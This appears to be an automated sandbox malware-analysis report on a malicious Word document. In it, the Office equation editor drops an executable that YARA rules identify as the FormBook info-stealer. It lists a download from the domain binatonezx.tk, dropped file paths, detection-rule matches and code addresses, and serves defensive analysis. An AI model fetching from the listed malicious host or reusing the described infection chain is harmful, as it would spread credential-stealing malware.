          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: binatonezx.tk
          Source: global trafficHTTP traffic detected: GET /seasonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeJump to dropped file
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D6AF8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB20
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67C0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D9918
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A80
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB10
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67AF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_011094B4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E423
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E507
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D5A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E5B3
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DE46
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409E60
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DFA2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E0C6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099D005
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098905A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00973040
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E2E9
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A11238
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009963DB
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096F3CF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00972305
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00977353
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009BA37B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00981489
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A5485
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098C5F0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097351F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00974680
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097E6C1
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A12622
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F579A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C7BC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0F8EE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C85C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099286D
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009729B2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1098E
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009869FE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F5955
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A23A83
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1CBA4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096FBD7
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009FDBDA
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00997B00
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0FDDD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A0D3B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097CD5B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A2E2F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098EE4C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00980F3F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099DF7C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A036
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00291082
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00292D02
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00298912
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E5CD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029B232
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B30
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B32
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_011094B4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C1238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E2E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02527353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0256A37B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02522305
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025463DB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251F3CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253905A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02523040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254D005
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E0C6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C2622
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252E6C1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02524680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025557C3
